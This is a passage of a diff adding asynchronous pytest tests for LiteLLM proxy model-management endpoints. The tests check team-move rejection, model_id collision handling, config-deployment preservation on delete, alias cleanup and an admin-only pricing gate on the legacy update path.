"model_name_teamX_" + ) + assert result.get("model_name") != "gpt-4" + + @pytest.mark.asyncio + async def test_patch_rejects_moving_model_to_a_different_team(self): + from litellm.proxy._types import ProxyException + from litellm.proxy.management_endpoints.model_management_endpoints import ( + _update_team_model_in_db, + ) + from litellm.types.router import Deployment, LiteLLM_Params, ModelInfo + + db_model = Deployment( + model_name="model_name_teamX_abc123", + litellm_params=LiteLLM_Params(model="azure/gpt-4o", api_key="sk-team"), + model_info=ModelInfo(team_id="teamX"), + ) + patch_data = updateDeployment(model_info=ModelInfo(team_id="teamY")) + + with ( + patch("litellm.proxy.proxy_server.premium_user", True), + patch( + "litellm.proxy.management_endpoints.model_management_endpoints.team_model_add" + ), + ): + with pytest.raises(ProxyException) as e: + await _update_team_model_in_db( + db_model=db_model, + patch_data=patch_data, + user_api_key_dict=UserAPIKeyAuth( + user_id="team-admin", + user_role=LitellmUserRoles.PROXY_ADMIN, + ), + prisma_client=MockPrismaClient(team_exists=True), # type: ignore + ) + assert str(e.value.code) == "403" + + # --- model_id spoofing + alias residue (126 / 168b) --- + + @pytest.mark.asyncio + async def test_add_new_model_rejects_colliding_model_id(self): + from litellm.proxy.management_endpoints.model_management_endpoints import ( + add_new_model, + ) + from litellm.proxy.proxy_server import ProxyException + from litellm.types.router import Deployment, LiteLLM_Params + + mock_router = MagicMock() + # The supplied id already belongs to a live (config) deployment. + mock_router.has_model_id = MagicMock(return_value=True) + mock_prisma = MagicMock() + mock_prisma.db = MagicMock() + mock_prisma.db.litellm_proxymodeltable = AsyncMock() + + _PS = "litellm.proxy.proxy_server" + with ( + patch(f"{_PS}.prisma_client", mock_prisma), + patch(f"{_PS}.store_model_in_db", True), + patch(f"{_PS}.proxy_config", MagicMock()), + patch(f"{_PS}.proxy_logging_obj", MagicMock()), + patch(f"{_PS}.general_settings", {}), + patch(f"{_PS}.premium_user", True), + patch(f"{_PS}.llm_router", mock_router), + ): + with pytest.raises(ProxyException) as e: + await add_new_model( + model_params=Deployment( + model_name="x", + litellm_params=LiteLLM_Params( + model="openai/gpt-4", api_key="k" + ), + model_info={"id": "config-model-1"}, + ), + user_api_key_dict=self._admin(), + ) + assert str(e.value.code) == "400" + mock_prisma.db.litellm_proxymodeltable.create.assert_not_called() + + @pytest.mark.asyncio + async def test_delete_preserves_config_origin_router_deployment(self): + from litellm.proxy.management_endpoints.model_management_endpoints import ( + ModelInfoDelete, + delete_model as delete_model_endpoint, + ) + from litellm.types.router import Deployment, LiteLLM_Params, ModelInfo + + model_id = "config-model-1" + db_row = LiteLLM_ProxyModelTable( + model_id=model_id, + model_name="m", + litellm_params={"model": "openai/gpt-4"}, + model_info={"id": model_id}, # no team_id (global/non-team row) + created_by="a", + updated_by="a", + ) + mock_prisma = MagicMock() + mock_prisma.db = MagicMock() + mock_prisma.db.litellm_proxymodeltable = AsyncMock() + mock_prisma.db.litellm_proxymodeltable.find_unique = AsyncMock( + return_value=db_row + ) + mock_prisma.db.litellm_proxymodeltable.delete = AsyncMock(return_value=db_row) + + mock_router = MagicMock() + mock_router.delete_deployment = MagicMock() + # The live router entry for this id is config-origin (db_model unset). + mock_router.get_deployment = MagicMock( + return_value=Deployment( + model_name="m", + litellm_params=LiteLLM_Params(model="openai/gpt-4"), + model_info=ModelInfo(id=model_id), + ) + ) + + _PS = "litellm.proxy.proxy_server" + with ( + patch(f"{_PS}.prisma_client", mock_prisma), + patch(f"{_PS}.store_model_in_db", True), + patch(f"{_PS}.premium_user", True), + patch(f"{_PS}.llm_router", mock_router), + ): + await delete_model_endpoint( + model_info=ModelInfoDelete(id=model_id), + user_api_key_dict=self._admin(), + ) + mock_prisma.db.litellm_proxymodeltable.delete.assert_awaited_once() + # The config deployment must NOT be evicted from the router. + mock_router.delete_deployment.assert_not_called() + + @pytest.mark.asyncio + async def test_delete_uses_team_public_model_name_for_alias(self): + from litellm.proxy.management_endpoints import ( + model_management_endpoints as mod, + ) + from litellm.proxy.management_endpoints.model_management_endpoints import ( + ModelInfoDelete, + delete_model as delete_model_endpoint, + ) + + model_id = "team-dep-1" + db_row = LiteLLM_ProxyModelTable( + model_id=model_id, + model_name="model_name_teamX_uuid", # internal UUID name + litellm_params={"model": "openai/gpt-4"}, + model_info={ + "id": model_id, + "team_id": "teamX", + "team_public_model_name": "team-alias", + }, + created_by="a", + updated_by="a", + ) + team_row = LiteLLM_TeamTable( + team_id="teamX", + team_alias="t", + models=["team-alias"], + members_with_roles=[], + ) + mock_prisma = MagicMock() + mock_prisma.db = MagicMock() + mock_prisma.db.litellm_proxymodeltable = AsyncMock() + mock_prisma.db.litellm_proxymodeltable.find_unique = AsyncMock( + return_value=db_row + ) + mock_prisma.db.litellm_proxymodeltable.delete = AsyncMock(return_value=db_row) + mock_prisma.db.litellm_teamtable = AsyncMock() + mock_prisma.db.litellm_teamtable.find_unique = AsyncMock(return_value=team_row) + mock_prisma.db.litellm_teamtable.update = AsyncMock() + + mock_router = MagicMock() + mock_router.get_deployment = MagicMock(return_value=None) + + captured = {} + + async def fake_delete_alias(public_model_name, prisma_client): + captured["public_model_name"] = public_model_name + return [] + + _PS = "litellm.proxy.proxy_server" + with ( + patch(f"{_PS}.prisma_client", mock_prisma), + patch(f"{_PS}.store_model_in_db", True), + patch(f"{_PS}.premium_user", True), + patch(f"{_PS}.llm_router", mock_router), + patch.object(mod, "delete_team_model_alias", side_effect=fake_delete_alias), + ): + await delete_model_endpoint( + model_info=ModelInfoDelete(id=model_id), + user_api_key_dict=self._admin(), + ) + # Must use the public alias, not the internal UUID model_name. + assert captured.get("public_model_name") == "team-alias" + + @pytest.mark.asyncio + async def test_legacy_update_model_pricing_is_proxy_admin_only(self): + """The legacy POST /model/update path must enforce the same pricing gate + as PATCH, so it can't be used to bypass it.""" + from litellm.proxy.management_endpoints.model_management_endpoints import ( + update_model, + ) + from litellm.proxy.proxy_server import ProxyException + from litellm.types.router import ( + ModelInfo, + updateDeployment, + updateLiteLLMParams, + ) + + model_id = "db-model-1" + existing_row = MagicMock() + existing_row.litellm_params = {"model": "openai/gpt-4o-mini", "api_key": "sk-x"} + existing_row.model_dump.return_value = { + "model_name": "m", + "litellm_params": existing_row.litellm_params, + "model_info": {"id": model_id, "team_id": "teamX"}, + } + + mock_prisma = MagicMock() + mock_prisma.db.litellm_proxymodeltable.find_unique = AsyncMock( + return_value=existing_row + ) + mock_prisma.db.litellm_proxymodeltable.update = AsyncMock() + + with ( + patch("litellm.proxy.proxy_server.prisma_client", mock_prisma), + patch("litellm.proxy.proxy_server.llm_router", MagicMock()), + patch("litellm.proxy.proxy_server.store_model_in_db", True), + patch("litellm.proxy.proxy_server.premium_user", True), + patch( + "litellm.proxy.management_endpoints.model_management_endpoints.ModelManagementAuthChecks.can_user_make_model_call", + new=AsyncMock(return_value=None), + ), + ): + with pytest.raises(ProxyException) as e: + await update_model( + model_params=updateDeployment( + litellm_params=updateLiteLLMParams(input_cost_per_token=0.0), + model_info=ModelInfo(id=model_id), + ), + user_api_key_dict=self._non_admin(), + ) + assert str(e.value.code) == "403" + mock_prisma.db.litellm_proxymodeltable.update.assert_not_called()